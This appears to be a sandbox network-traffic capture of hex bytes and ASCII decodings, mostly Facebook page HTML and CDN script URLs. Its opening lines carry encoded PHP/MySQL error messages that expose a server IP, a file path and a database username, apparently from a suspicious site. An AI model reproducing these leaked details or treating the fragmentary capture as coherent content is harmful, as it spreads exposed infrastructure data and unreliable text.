2022-10-07 13:58:46 UTC	236	IN	Data Raw: 43 2f 62 25 33 45 25 30 41 25 33 43 62 72 25 32 30 2f 25 33 45 25 30 41 25 33 43 62 72 25 32 30 2f 25 33 45 25 30 41 25 33 43 62 25 33 45 57 61 72 6e 69 6e 67 25 33 43 2f 62 25 33 45 3a 25 32 30 25 32 30 6d 79 73 71 6c 5f 71 75 65 72 79 28 29 25 32 30 65 78 70 65 63 74 73 25 32 30 70 61 72 61 6d 65 74 65 72 25 32 30 32 25 32 30 74 6f 25 32 30 62 65 25 32 30 72 65 73 6f 75 72 63 65 2c 25 32 30 62 6f 6f 6c 65 61 6e 25 32 30 67 69 76 65 6e 25 32 30 69 6e 25 32 30 25 33 43 62 25 33 45 2f 77 77 77 2f 77 77 77 72 6f 6f 74 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 2f 73 65 65 6d 6f 72 65 62 74 79 2f 69 6e 63 6c 75 64 65 73 2f 64 61 74 61 62 61 73 65 2e 70 68 70 25 33 43 2f 62 25 33 45 25 32 30 6f 6e 25 32 30 6c 69 6e 65 25 32 30 25 33 43 62 25 33 45 37 33 25 Data Ascii: C/b%3E%0A%3Cbr%20/%3E%0A%3Cbr%20/%3E%0A%3Cb%3EWarning%3C/b%3E:%20%20mysql_query()%20expects%20parameter%202%20to%20be%20resource,%20boolean%20given%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E73%
2022-10-07 13:58:46 UTC	237	IN	Data Raw: 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 3a 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 32 30 6d 79 73 71 6c 5f 70 63 6f 6e 6e 65 63 74 28 29 3a 5c 75 30 30 32 35 32 30 41 63 63 65 73 73 5c 75 30 30 32 35 32 30 64 65 6e 69 65 64 5c 75 30 30 32 35 32 30 66 6f 72 5c 75 30 30 32 35 32 30 75 73 65 72 5c 75 30 30 32 35 32 30 26 23 30 33 39 3b 64 62 6e 65 77 30 31 26 23 30 33 39 3b 5c 75 30 30 34 30 26 23 30 33 39 3b 6c 6f 63 61 6c 68 6f 73 74 26 23 30 33 39 3b 5c 75 30 30 32 35 32 30 28 75 73 69 6e 67 5c 75 30 30 32 35 32 30 70 61 73 73 77 6f 72 64 3a 5c 75 30 30 32 35 32 30 59 45 53 29 5c 75 30 30 32 35 32 30 69 6e 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 5c 2f 77 77 77 5c 2f 77 77 77 72 6f 6f 74 5c 2f 31 30 33 2e 31 33 36 Data Ascii: 253C\/b\u00253E:\u002520\u002520mysql_pconnect():\u002520Access\u002520denied\u002520for\u002520user\u002520'dbnew01'\u0040'localhost'\u002520(using\u002520password:\u002520YES)\u002520in\u002520\u00253Cb\u00253E\/www\/wwwroot\/103.136
2022-10-07 13:58:46 UTC	238	IN	Data Raw: 30 32 35 35 44 5c 75 30 30 32 35 33 43 5c 2f 66 6f 6e 74 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 5c 2f 73 6d 61 6c 6c 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 5c 2f 66 6f 6e 74 5c 75 30 30 32 35 33 45 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 77 77 77 5f 6c 69 73 74 5f 73 65 6c 65 63 74 6f 72 26 71 75 6f 74 3b 2c 20 39 29 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 20 74 69 74 6c 65 3d 22 53 69 6d 70 6c 69 66 69 65 64 20 43 68 69 6e 65 73 65 20 28 43 68 69 Data Ascii: 0255D\u00253C\/font\u00253E\u00250A\u00253C\/small\u00253E\u00250A\u00253Cbr\u00253E\u00250A\u00253Cbr\u00253E\u00250A\u00253C\/b\u00253E\u00250A\u00253C\/font\u00253E", "www_list_selector", 9); return false;" title="Simplified Chinese (Chi
2022-10-07 13:58:46 UTC	240	IN	Data Raw: 35 33 25 32 46 73 65 65 6d 6f 72 65 62 74 79 25 32 46 69 6e 63 6c 75 64 65 73 25 32 46 64 61 74 61 62 61 73 65 2e 70 68 70 25 32 35 33 43 25 32 46 62 25 32 35 33 45 25 32 35 32 30 6f 6e 25 32 35 32 30 6c 69 6e 65 25 32 35 32 30 25 32 35 33 43 62 25 32 35 33 45 37 33 25 32 35 33 43 25 32 46 62 25 32 35 33 45 25 32 35 30 41 25 32 35 33 43 62 72 25 32 35 32 30 25 32 46 25 32 35 33 45 25 32 35 30 41 25 32 35 33 43 66 6f 6e 74 25 32 35 32 30 63 6f 6c 6f 72 25 33 44 25 32 35 32 32 25 32 35 32 33 30 30 30 30 30 30 25 32 35 32 32 25 32 35 33 45 25 32 35 30 41 25 32 35 33 43 62 25 32 35 33 45 31 30 34 35 25 32 35 32 30 2d 25 32 35 32 30 41 63 63 65 73 73 25 32 35 32 30 64 65 6e 69 65 64 25 32 35 32 30 66 6f 72 25 32 35 32 30 75 73 65 72 25 32 35 32 30 25 32 37 64 Data Ascii: 53%2Fseemorebty%2Fincludes%2Fdatabase.php%253C%2Fb%253E%2520on%2520line%2520%253Cb%253E73%253C%2Fb%253E%250A%253Cbr%2520%2F%253E%250A%253Cfont%2520color%3D%2522%2523000000%2522%253E%250A%253Cb%253E1045%2520-%2520Access%2520denied%2520for%2520user%2520%27d
2022-10-07 13:58:46 UTC	241	IN	Data Raw: 68 72 65 66 3d 22 2f 67 61 6d 65 73 2f 22 20 74 69 74 6c 65 3d 22 43 68 65 63 6b 20 6f 75 74 20 46 61 63 65 62 6f 6f 6b 20 67 61 6d 65 73 2e 22 3e 47 61 6d 65 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 6d 61 72 6b 65 74 70 6c 61 63 65 2f 22 20 74 69 74 6c 65 3d 22 42 75 79 20 61 6e 64 20 73 65 6c 6c 20 6f 6e 20 46 61 63 65 62 6f 6f 6b 20 4d 61 72 6b 65 74 70 6c 61 63 65 2e 22 3e 4d 61 72 6b 65 74 70 6c 61 63 65 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 61 79 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 22 20 74 69 74 6c 65 3d 22 4c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f 75 74 20 4d 65 74 61 20 50 61 79 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 4d 65 74 61 20 50 61 79 Data Ascii: href="/games/" title="Check out Facebook games.">Games</a></li><li><a href="/marketplace/" title="Buy and sell on Facebook Marketplace.">Marketplace</a></li><li><a href="https://pay.facebook.com/" title="Learn more about Meta Pay" target="_blank">Meta Pay
2022-10-07 13:58:46 UTC	243	IN	Data Raw: 72 63 65 20 63 65 6e 74 65 72 2c 20 61 6e 64 20 66 69 6e 64 20 6a 6f 62 20 6f 70 70 6f 72 74 75 6e 69 74 69 65 73 2e 22 3e 41 62 6f 75 74 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 61 64 5f 63 61 6d 70 61 69 67 6e 2f 6c 61 6e 64 69 6e 67 2e 70 68 70 3f 70 6c 61 63 65 6d 65 6e 74 3d 70 66 6c 6f 26 61 6d 70 3b 63 61 6d 70 61 69 67 6e 5f 69 64 3d 34 30 32 30 34 37 34 34 39 31 38 36 26 61 6d 70 3b 6e 61 76 5f 73 6f 75 72 63 65 3d 75 6e 6b 6e 6f 77 6e 26 61 6d 70 3b 65 78 74 72 61 5f 31 3d 61 75 74 6f 22 20 74 69 74 6c 65 3d 22 41 64 76 65 72 74 69 73 65 20 6f 6e 20 46 61 63 65 62 6f 6f 6b 2e 22 3e 43 72 65 61 74 65 20 41 64 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 70 61 67 65 73 2f 63 72 65 61 74 65 2f 3f Data Ascii: rce center, and find job opportunities.">About</a></li><li><a href="/ad_campaign/landing.php?placement=pflo&campaign_id=402047449186&nav_source=unknown&extra_1=auto" title="Advertise on Facebook.">Create Ad</a></li><li><a href="/pages/create/?
2022-10-07 13:58:46 UTC	244	IN	Data Raw: 69 74 79 3f 70 72 69 76 61 63 79 5f 73 6f 75 72 63 65 3d 61 63 74 69 76 69 74 79 5f 6c 6f 67 5f 74 6f 70 5f 6d 65 6e 75 22 20 74 69 74 6c 65 3d 22 56 69 65 77 20 79 6f 75 72 20 61 63 74 69 76 69 74 79 20 6c 6f 67 22 3e 41 63 74 69 76 69 74 79 20 6c 6f 67 3c 2f 61 3e 3c 2f 6c 69 3e 3c 2f 75 6c 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 76 6c 20 63 6f 70 79 72 69 67 68 74 22 3e 3c 64 69 76 3e 3c 73 70 61 6e 3e 20 4d 65 74 61 20 c2 a9 20 32 30 32 32 3c 2f 73 70 61 6e 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 3e 3c 2f 64 69 76 3e 3c 73 70 61 6e 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 73 65 63 75 72 69 74 79 2f 68 73 74 73 2d Data Ascii: ity?privacy_source=activity_log_top_menu" title="View your activity log">Activity log</a></li></ul></div><div class="mvl copyright"><div><span> Meta 2022</span></div></div></div></div></div><div></div><span><img src="https://facebook.com/security/hsts-
2022-10-07 13:58:46 UTC	246	IN	Data Raw: 73 75 6c 74 22 3a 74 72 75 65 2c 22 68 61 73 68 22 3a 22 41 54 37 38 47 34 66 44 58 68 6c 6e 4d 6c 37 6f 6a 38 6b 22 7d 2c 22 31 36 34 37 32 36 30 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 34 57 64 6b 72 51 53 47 45 35 64 49 73 45 61 34 41 22 7d 2c 22 31 36 39 35 38 33 31 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 37 52 41 36 54 4a 6d 44 46 47 46 2d 44 36 6a 4f 38 22 7d 2c 22 31 37 32 32 30 31 34 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 36 5f 4d 35 67 70 63 36 52 4c 72 48 6a 63 79 4d 51 22 7d 2c 22 31 37 34 32 37 39 35 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 36 64 62 6e 59 35 4a 5a 6d 5f Data Ascii: sult":true,"hash":"AT78G4fDXhlnMl7oj8k"},"1647260":{"result":false,"hash":"AT4WdkrQSGE5dIsEa4A"},"1695831":{"result":false,"hash":"AT7RA6TJmDFGF-D6jO8"},"1722014":{"result":false,"hash":"AT6_M5gpc6RLrHjcyMQ"},"1742795":{"result":false,"hash":"AT6dbnY5JZm_
2022-10-07 13:58:46 UTC	247	IN	Data Raw: 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 6e 5c 2f 72 5c 2f 47 32 6d 61 49 71 32 6b 57 43 56 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 6c 57 4f 76 47 54 61 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 46 5c 2f 72 5c 2f 52 64 5a 31 46 42 45 71 42 39 50 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 42 49 79 6c 4b 43 34 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 Data Ascii: tatic.xx.fbcdn.net\/rsrc.php\/v3\/yn\/r\/G2maIq2kWCV.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"lWOvGTa":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yF\/r\/RdZ1FBEqB9P.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"BIylKC4":{"type":"js","src":"https:\/\/static.x
2022-10-07 13:58:46 UTC	249	IN	Data Raw: 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 69 71 45 53 34 5c 2f 79 72 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 5a 71 36 61 5f 76 51 6c 37 51 42 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 64 69 6f 67 56 61 75 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 55 5c 2f 72 5c 2f 35 31 34 54 53 75 73 68 42 43 67 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 59 74 55 33 43 35 75 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 Data Ascii: \/\/static.xx.fbcdn.net\/rsrc.php\/v3iqES4\/yr\/l\/en_US\/Zq6a_vQl7QB.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"diogVau":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yU\/r\/514TSushBCg.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"YtU3C5u":{"type":"js","src":"h
2022-10-07 13:58:46 UTC	250	IN	Data Raw: 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 4a 5c 2f 72 5c 2f 74 36 30 4e 75 58 42 4a 6d 4d 72 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 64 41 78 58 30 6a 6a 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 72 5c 2f 72 5c 2f 4d 2d 32 34 6b 57 63 4f 74 31 61 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 74 6a 6d 6b 2b 30 4b 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c Data Ascii: rc.php\/v3\/yJ\/r\/t60NuXBJmMr.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"dAxX0jj":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yr\/r\/M-24kWcOt1a.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"tjmk+0K":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\
2022-10-07 13:58:46 UTC	251	IN	Data Raw: 6e 63 22 3a 31 7d 2c 22 47 44 70 76 74 4b 33 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 44 5c 2f 72 5c 2f 30 57 6d 61 66 66 41 57 66 78 68 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 6a 31 76 63 68 56 64 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 69 63 34 70 34 5c 2f 79 78 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 46 4a 7a 74 6f 75 76 55 66 46 73 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 Data Ascii: nc":1},"GDpvtK3":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yD\/r\/0WmaffAWfxh.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"j1vchVd":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3ic4p4\/yx\/l\/en_US\/FJztouvUfFs.js?_nc_x=Ij3Wp8lg5
2022-10-07 13:58:46 UTC	253	IN	Data Raw: 5c 2f 76 33 69 55 69 58 34 5c 2f 79 49 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 4a 4c 36 51 52 65 68 53 43 30 50 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 69 4a 37 4e 57 45 4a 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 58 5c 2f 72 5c 2f 52 5f 59 63 62 37 73 43 49 6a 4b 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 61 75 42 30 62 4e 72 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 Data Ascii: \/v3iUiX4\/yI\/l\/en_US\/JL6QRehSC0P.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"iJ7NWEJ":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yX\/r\/R_Ycb7sCIjK.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"auB0bNr":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsr
2022-10-07 13:58:46 UTC	254	IN	Data Raw: 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 71 5c 2f 72 5c 2f 53 78 72 75 62 71 6c 32 37 6f 39 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 35 56 78 43 64 34 48 22 3a 7b 22 74 79 70 65 22 3a 22 63 73 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 4a 5c 2f 6c 5c 2f 30 2c 63 72 6f 73 73 5c 2f 45 44 6b 67 4a 53 44 54 39 41 4a 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 4f 4a 30 33 Data Ascii: :{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yq\/r\/Sxrubql27o9.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"5VxCd4H":{"type":"css","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yJ\/l\/0,cross\/EDkgJSDT9AJ.css?_nc_x=Ij3Wp8lg5Kz","nc":1},"OJ03
2022-10-07 13:58:46 UTC	256	IN	Data Raw: 63 2e 70 68 70 5c 2f 76 33 69 46 61 33 34 5c 2f 79 6c 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 57 59 4d 75 65 35 4f 32 47 73 4a 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 37 49 37 78 77 72 73 22 3a 7b 22 74 79 70 65 22 3a 22 63 73 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 6d 5c 2f 6c 5c 2f 30 2c 63 72 6f 73 73 5c 2f 6f 4e 71 5f 32 75 51 50 33 72 4a 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 6e 4e 78 6a 46 2b 4e 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 Data Ascii: c.php\/v3iFa34\/yl\/l\/en_US\/WYMue5O2GsJ.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"7I7xwrs":{"type":"css","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/ym\/l\/0,cross\/oNq_2uQP3rJ.css?_nc_x=Ij3Wp8lg5Kz","nc":1},"nNxjF+N":{"type":"js","src":"https:\/\/static.x
2022-10-07 13:58:46 UTC	257	IN	Data Raw: 5c 2f 65 6e 5f 55 53 5c 2f 52 67 48 73 50 74 68 2d 71 63 5f 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 4c 6d 4b 32 73 56 4b 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 69 74 44 58 34 5c 2f 79 64 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 4e 66 46 61 42 78 35 56 71 4c 62 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 48 6b 75 38 2b 5a 5a 22 3a 7b 22 74 79 70 65 22 3a 22 63 73 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 Data Ascii: \/en_US\/RgHsPth-qc_.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"LmK2sVK":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3itDX4\/yd\/l\/en_US\/NfFaBx5VqLb.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"Hku8+ZZ":{"type":"css","src":"https:\/\/static.xx.fbcdn.net\/rsrc.p
2022-10-07 13:58:46 UTC	259	IN	Data Raw: 36 4d 59 58 55 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 69 4a 66 58 34 5c 2f 79 63 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 69 72 55 72 5a 58 76 4e 76 6f 47 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 35 63 7a 51 35 77 54 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 69 58 4a 6b 34 5c 2f 79 5a 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 4a 49 34 34 50 72 48 56 4f 6c 47 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c Data Ascii: 6MYXU":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3iJfX4\/yc\/l\/en_US\/irUrZXvNvoG.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"5czQ5wT":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3iXJk4\/yZ\/l\/en_US\/JI44PrHVOlG.js?_nc_x=Ij3Wp8l
2022-10-07 13:58:46 UTC	260	IN	Data Raw: 68 70 5c 2f 76 33 69 6b 41 61 34 5c 2f 79 65 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 6f 71 4a 62 64 39 73 72 36 4c 73 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 53 57 78 33 79 4e 76 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 44 5c 2f 72 5c 2f 52 78 33 62 34 36 63 74 71 56 77 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 6f 45 34 44 6f 66 54 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 Data Ascii: hp\/v3ikAa4\/ye\/l\/en_US\/oqJbd9sr6Ls.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"SWx3yNv":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yD\/r\/Rx3b46ctqVw.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"oE4DofT":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/r
2022-10-07 13:58:46 UTC	261	IN	Data Raw: 62 65 22 3a 31 7d 2c 22 46 6f 72 6d 22 3a 7b 22 72 22 3a 5b 22 38 7a 62 45 5a 74 75 22 2c 22 5a 32 47 6a 56 75 39 22 2c 22 76 47 74 32 6d 78 7a 22 2c 22 51 4d 6d 34 47 43 6d 22 5d 2c 22 62 65 22 3a 31 7d 2c 22 46 6f 72 6d 53 75 62 6d 69 74 22 3a 7b 22 72 22 3a 5b 22 4d 43 4f 45 53 49 49 22 2c 22 6e 36 57 34 78 4d 48 22 2c 22 38 7a 62 45 5a 74 75 22 2c 22 5a 32 47 6a 56 75 39 22 2c 22 76 47 74 32 6d 78 7a 22 2c 22 68 33 5a 7a 41 6d 47 22 2c 22 51 4d 6d 34 47 43 6d 22 5d 2c 22 72 64 73 22 3a 7b 22 6d 22 3a 5b 22 46 62 74 4c 6f 67 67 69 6e 67 22 2c 22 49 6e 74 6c 51 74 45 76 65 6e 74 46 61 6c 63 6f 45 76 65 6e 74 22 2c 22 42 61 6e 7a 61 69 53 63 75 62 61 5f 44 45 50 52 45 43 41 54 45 44 22 5d 2c 22 72 22 3a 5b 22 42 49 79 6c 4b 43 34 22 